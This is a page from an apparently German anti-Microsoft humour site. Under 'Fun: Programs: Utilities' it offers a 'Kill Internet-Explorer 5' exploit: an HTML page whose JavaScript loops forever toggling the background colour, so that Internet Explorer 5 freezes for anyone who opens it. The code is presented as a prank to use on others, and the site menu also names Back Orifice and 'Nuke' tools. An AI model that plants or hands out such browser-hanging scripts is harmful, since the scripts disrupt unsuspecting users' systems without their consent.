Anti-Mikroschrott Fun: Programs: Utilities

 

Fun
+Jokes
+Games
+Media
+Programs
++Utilities
+++Back Orifice
+++Del IE 95
+++Del IE 98
+++Kill IE
+++IE not allow
+++Use Netscape
++Nuke
+Quotation
Downloads
Products
Company
Persons
Misc

deutsch    english
Startside -> Fun -> Programs -> Utilities -> Kill Internet-Explorer 5  

Utilities: Kill Internet-Explorer 5

This is a new exploit which affects Microsoft Internet Explorer 5.0. When you enter the html document below, IE will freeze and you have to close it with
ctrl + alt + del.

<HTML>
<BODY>
<SCRIPT>

var color = new Array;
color[1] = "black";
color[2] = "white";

for(x = 0; x <3; x++)
{
        document.bgColor = color[x]
        if(x == 2)
        {
                x = 0;
        }
}


</SCRIPT>
</BODY>
</HTML>
© 1997 - 2012 Dieter Gerth